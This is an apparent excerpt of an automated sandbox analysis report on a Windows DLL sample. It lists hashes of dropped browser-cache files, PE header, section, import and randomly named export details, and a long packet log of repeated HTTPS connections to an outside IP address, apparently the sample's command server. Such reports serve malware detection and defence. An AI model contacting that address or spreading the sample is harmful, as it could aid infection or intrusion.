                                                                                                                                                                                                                              SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                                                                                                                                                              MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                                                                                                                                                              SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                                                                                                                                                              SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                                                                                                                                                              SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\de-ch[1].htm
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):424625
                                                                                                                                                                                                                              Entropy (8bit):5.43920457346751
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:/fKJUixx+PAkJ8TFHX81PAUYCSDVvoKzrW39vqLCFQGXmW31zf7hLZ:/fKdOPLD8QzNx12sr7j
                                                                                                                                                                                                                              MD5:53F4C099E8CAE84650E8F1836D07F4E4
                                                                                                                                                                                                                              SHA1:158DC65DFFBD6E72A9185C40DEC9ABBDE6A97A62
                                                                                                                                                                                                                              SHA-256:C1DBB15CC74F4C8441F9E03544E227AFD24E4D3346F8AB08CBE749B8EDE6DAAD
                                                                                                                                                                                                                              SHA-512:2A2013226E63FA3D174A40877127606A4B1F739E785DE90DF0A0990E01AE2BE192AF1B59622675A80578386D32D3441178D93CDDCC2BBD80923A4F484E3E988F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\e151e5[1].gif
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                              Entropy (8bit):3.122191481864228
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                                              MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                                              SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                                              SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                                              SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\jquery-2.1.1.min[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):84249
                                                                                                                                                                                                                              Entropy (8bit):5.369991369254365
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                                                              MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                                                              SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                                                              SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                                                                                                                                                              SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DF45825F63611628F7.TMP
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176128
                                                                                                                                                                                                                              Entropy (8bit):3.334964652553981
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:AZ/2Bfcdmu5kgTzGtfZ/2Bfc+mu5kgTzGt:5M
                                                                                                                                                                                                                              MD5:6A627D6B64FE34D0B7DB804243065783
                                                                                                                                                                                                                              SHA1:8A748CA1491DF84FFA5B5D4D2A06EEC17494432C
                                                                                                                                                                                                                              SHA-256:7DD2D0CACFC5751DC032E29F469890F89358864324730188F07621EB8D7F3E63
                                                                                                                                                                                                                              SHA-512:6FAEF9E76BA136F9648857E8030E80709672B72BD0E16115EF5155BB5B128BF0211065B3BC9CCFD94C147778F3E4DD183F585D928EEF888C1031DEF46FC10F34
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DFCCE32108ABF6B532.TMP
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                              Entropy (8bit):0.08190170918129491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Jf/RRRlKVAnRR6Zknl6/lclllv/nt+lybltll1lRslkhlEkllAr9J/RRBFhJ/RRb:x9lOFZ0+UFAlkxIflzJX
                                                                                                                                                                                                                              MD5:F922CB9DE2EFEDD152591137E34DF43E
                                                                                                                                                                                                                              SHA1:82CBACE5D84D5D7EE068C87AA3A94E2803E145CB
                                                                                                                                                                                                                              SHA-256:BBFF737D53E4C0C17CE1998CBBBD59D1F6F7CCE60F81668FF75353FA615698DE
                                                                                                                                                                                                                              SHA-512:6BC9F13D1B27661BDC697ECCA9F5E085D5D5E8DB3AE20E0D4E356F67071AF6DDD583C5030A05232CF40809C34DD1960615AA96C353BA92955ECC08C88FB8AF94
                                                                                                                                                                                                                              Malicious:false

                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Entropy (8bit):7.138662325535767
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.40%
                                                                                                                                                                                                                              • Clipper DOS Executable (2020/12) 0.20%
                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                              File name:WTXuYxax6d.dll
                                                                                                                                                                                                                              File size:125952
                                                                                                                                                                                                                              MD5:cbe2a109ef92af54de51a534980151a7
                                                                                                                                                                                                                              SHA1:e71ab85a35df851229f87fde059ad35ed167bdbc
                                                                                                                                                                                                                              SHA256:450a436cf830b03533a2ce0d8d40724d61c8b0e5f8164413c05d2c870b4ba8eb
                                                                                                                                                                                                                              SHA512:c30e3d42ed63a1327088111cc7ad3baa11149d5a9c9b7778a7561bc67a38c07be01978654128f29486c595441cc13a82ceaf6026ec9b04bbf5e2f1fd01c06020
                                                                                                                                                                                                                              SSDEEP:3072:FSGsYBXQAs5JLGk+9wDTXSH1/FKBl0C7p+1mwu/:FELKkOh4B2Cd+Tu/
                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................................................................................................................

                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                              Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Entrypoint:0x100071f1
                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                              Imagebase:0x10000000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                              Time Stamp:0x619A563C [Sun Nov 21 14:22:52 2021 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                              Import Hash:4c89e39b5ebc619c69b957c6b4f65780

                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                                                                                                              jne 00007F1EDC99D0F7h
                                                                                                                                                                                                                              call 00007F1EDC99D279h
                                                                                                                                                                                                                              push dword ptr [ebp+10h]
                                                                                                                                                                                                                              push dword ptr [ebp+0Ch]
                                                                                                                                                                                                                              push dword ptr [ebp+08h]
                                                                                                                                                                                                                              call 00007F1EDC99CFA3h
                                                                                                                                                                                                                              add esp, 0Ch
                                                                                                                                                                                                                              pop ebp
                                                                                                                                                                                                                              retn 000Ch
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              push 00000000h
                                                                                                                                                                                                                              call dword ptr [1001100Ch]
                                                                                                                                                                                                                              push dword ptr [ebp+08h]
                                                                                                                                                                                                                              call dword ptr [10011008h]
                                                                                                                                                                                                                              push C0000409h
                                                                                                                                                                                                                              call dword ptr [10011010h]
                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                              call dword ptr [10011014h]
                                                                                                                                                                                                                              pop ebp
                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              sub esp, 00000324h
                                                                                                                                                                                                                              push 00000017h
                                                                                                                                                                                                                              call dword ptr [10011018h]
                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                              je 00007F1EDC99D0F7h
                                                                                                                                                                                                                              push 00000002h
                                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                                              int 29h
                                                                                                                                                                                                                              mov dword ptr [1001F228h], eax
                                                                                                                                                                                                                              mov dword ptr [1001F224h], ecx
                                                                                                                                                                                                                              mov dword ptr [1001F220h], edx
                                                                                                                                                                                                                              mov dword ptr [1001F21Ch], ebx
                                                                                                                                                                                                                              mov dword ptr [1001F218h], esi
                                                                                                                                                                                                                              mov dword ptr [1001F214h], edi
                                                                                                                                                                                                                              mov word ptr [1001F240h], ss
                                                                                                                                                                                                                              mov word ptr [1001F234h], cs
                                                                                                                                                                                                                              mov word ptr [1001F210h], ds
                                                                                                                                                                                                                              mov word ptr [1001F20Ch], es
                                                                                                                                                                                                                              mov word ptr [1001F208h], fs
                                                                                                                                                                                                                              mov word ptr [1001F204h], gs
                                                                                                                                                                                                                              pushfd
                                                                                                                                                                                                                              pop dword ptr [1001F238h]
                                                                                                                                                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                              mov dword ptr [1001F22Ch], eax
                                                                                                                                                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                              mov dword ptr [0001F230h], eax

                                                                                                                                                                                                                              Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x19db0          0x25c         .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1a00c          0x28          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x22000          0xf8          .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x23000          0xe68         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x19600          0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x19638          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x11000          0x104         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                                                                                                                                              Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0xfdd8        0xfe00    False     0.686069758858   data       7.13842205011  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x11000          0x95e6        0x9600    False     0.670651041667   data       6.50007500448  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x1b000          0x6994        0x4200    False     0.885002367424   data       7.5794714709   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0x22000          0xf8          0x200     False     0.3359375        data       2.51977440023  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x23000          0xe68         0x1000    False     0.716064453125   data       6.24269223414  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                              Resources

Name         RVA      Size  Type                   Language  Country
RT_MANIFEST  0x22060  0x91  XML 1.0 document text  English   United States

                                                                                                                                                                                                                              Imports

DLL           Import
KERNEL32.dll  GetProcessHeap, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, RaiseException, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, GetFileType, LCMapStringW, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer

                                                                                                                                                                                                                              Exports

Name                Ordinal  Address
DllRegisterServer   1        0x100061f0
azfdnkcrayghb       2        0x100065a0
bngggbakts          3        0x10006500
cunlfsvblccv        4        0x10006590
ebmjouyc            5        0x100064f0
ekwbgjj             6        0x100065b0
fdmhczzd            7        0x100064c0
gspwisblvuftkl      8        0x10006570
gwboxsvpsi          9        0x100064b0
ikfxcxbdabudzqolj   10       0x100064d0
ksljwhpnlr          11       0x100064e0
lzojholmof          12       0x10006600
ncupmigdtibtbdjf    13       0x10006530
ndbzamsbksf         14       0x100065d0
nsivlepszncwpueue   15       0x10006550
nysmcddhsfh         16       0x10006580
ofvladazig          17       0x100065f0
psxkssj             18       0x10006560
spihkiem            19       0x100065c0
ulmdkxfqb           20       0x10006520
wjjbdekzxjutynirw   21       0x10006540
xyrxsfxubf          22       0x100065e0
yusqfamwizitquyzv   23       0x10006510
ywbiblphcylsyjl     24       0x10006610

                                                                                                                                                                                                                              Possible Origin

Language of compilation system    Country where language is spoken
English                           United States

                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                              Nov 23, 2021 10:53:44.713426113 CET49888443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:44.713447094 CET4434988845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:44.775238037 CET4434988845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.350672960 CET49895443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.350722075 CET4434989545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.350825071 CET49895443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.351983070 CET49895443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.352009058 CET4434989545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.413355112 CET4434989545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.415147066 CET49896443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.415189028 CET4434989645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.415365934 CET49896443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.416321993 CET49896443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.416348934 CET4434989645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.480401993 CET4434989645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.482017994 CET49897443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.482064962 CET4434989745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.482331038 CET49897443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.483169079 CET49897443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.483195066 CET4434989745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.544327974 CET4434989745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.546047926 CET49898443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.546096087 CET4434989845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.546205997 CET49898443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.547077894 CET49898443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.547091007 CET4434989845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.610582113 CET4434989845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.606523991 CET49911443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.606570959 CET4434991145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.607768059 CET49911443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.608586073 CET49911443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.608612061 CET4434991145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.671256065 CET4434991145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.673342943 CET49912443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.673392057 CET4434991245.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.673499107 CET49912443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.674355030 CET49912443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.674371004 CET4434991245.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.737011909 CET4434991245.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.740546942 CET49913443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.740601063 CET4434991345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.740878105 CET49913443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.741461039 CET49913443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.741487026 CET4434991345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.805294991 CET4434991345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.807537079 CET49914443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.807590008 CET4434991445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.807671070 CET49914443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.808450937 CET49914443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.808470011 CET4434991445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.871059895 CET4434991445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.205311060 CET49922443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.205353975 CET4434992245.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.205476999 CET49922443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.206681967 CET49922443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.206701040 CET4434992245.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.268992901 CET4434992245.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.271075964 CET49923443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.271115065 CET4434992345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.271234989 CET49923443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.272401094 CET49923443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.272423983 CET4434992345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.332369089 CET4434992345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.335417986 CET49924443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.335460901 CET4434992445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.335561991 CET49924443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.336416006 CET49924443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.336429119 CET4434992445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.401093006 CET4434992445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.402777910 CET49925443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.402832031 CET4434992545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.402965069 CET49925443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.403564930 CET49925443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.403592110 CET4434992545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.466739893 CET4434992545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:07.984357119 CET49926443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:07.984402895 CET4434992645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:07.985043049 CET49926443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:07.985886097 CET49926443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:07.985903025 CET4434992645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.046808004 CET4434992645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.048362017 CET49927443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.048405886 CET4434992745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.048510075 CET49927443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.049268007 CET49927443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.049289942 CET4434992745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.110407114 CET4434992745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.118282080 CET49928443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.118333101 CET4434992845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.118448973 CET49928443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.119378090 CET49928443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.119405031 CET4434992845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.181550980 CET4434992845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.184768915 CET49929443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.184814930 CET4434992945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.184974909 CET49929443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.186116934 CET49929443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:08.186137915 CET4434992945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.688169956 CET4435002445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.689389944 CET50025443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.689454079 CET4435002545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.689542055 CET50025443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.690299034 CET50025443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.690318108 CET4435002545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.751769066 CET4435002545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.753623962 CET50026443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.753670931 CET4435002645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.753748894 CET50026443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.754585028 CET50026443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.754601002 CET4435002645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.793507099 CET50027443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.793546915 CET4435002745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.793626070 CET50027443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.794195890 CET50027443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.794210911 CET4435002745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.815529108 CET4435002645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.816690922 CET50028443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.816726923 CET4435002845.9.20.245192.168.2.6
